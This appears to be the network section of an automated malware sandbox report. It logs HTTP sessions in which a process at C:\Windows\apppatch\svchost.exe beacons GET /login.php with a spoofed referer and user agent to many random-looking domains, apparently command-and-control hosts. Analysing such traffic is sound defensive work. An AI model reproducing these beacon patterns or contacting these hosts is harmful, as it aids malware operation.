                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=glOaGdDO9BBkkhKiDNlpEXwH%2FNQZiIMw76v4gnJWKp8gk08wgQ8Gy7iTKIHjQjwdlZhVJLxwVYFShSoGWTfQmPiBWu9t4mj1LuWtzVizVz8deTIG3IPpzeYSU7UBoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1358c870c8e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.413921118 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.747898102 CET807INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:40 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WSX6vrUcOPLadbm1DOdJ2CQPL%2BgBGLE3R5t4eJ39Ck3%2FeAUV9SGvJV73CnaAvKBYHLfhQq3c9pkayYDKPazI9tfMl%2F8q%2BzhXWAuYfBfiDhXb4abowpeHnhtG%2BDudg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe141ee650c8e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=964&recv_bytes=486&delivery_rate=2443881&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.748049974 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.751533985 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.152508974 CET803INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H3xQ5Xg8qhnS7BSEhQtrtcn7VDB74vy0LEsoQIppOUiSKe%2Bszd0Xt3A8iSK5vLlyTZ%2FiSqhmkIIlGu8RtksM0cfgTdGGWk2vX4rVHS1Zh7x46h0hDKMz5wO9Dn2Jtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1bacc270c8e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1944&recv_bytes=729&delivery_rate=3480769&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.158636093 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.995275021 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.366235018 CET977INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:02 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SvQIyXg7NzrX6z6Gt56vhTRAOl55feJv5ridekP2w4WXT%2FyV3bhGpn73UlVZqHbL0Sm2bIpUDOU3ghnsMw2k7%2FJ8RdmONkBa1AJv2zHchfRgkz1dy%2B8aTXUv7JQXRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1c8ce8c0c8e-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1158&sent=12&recv=14&lost=0&retrans=0&sent_bytes=2920&recv_bytes=972&delivery_rate=3480769&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.95686499.83.170.3807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.110460043 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.535010099 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.95686918.208.156.248807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.346312046 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vonypom.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.773797035 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.95687044.221.84.105807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.390280008 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.821355104 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.95687144.221.84.105807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.395880938 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.830867052 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.956872208.100.26.245807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.432598114 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.877521992 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.500634909 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.603194952 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:39 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.837270021 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.940177917 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:59 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.994874954 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.098310947 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.956873199.191.50.83807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:38.441463947 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.989993095 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:38 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            Set-Cookie: vsid=910vr4788904590031611; expires=Sat, 10-Nov-2029 17:07:38 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
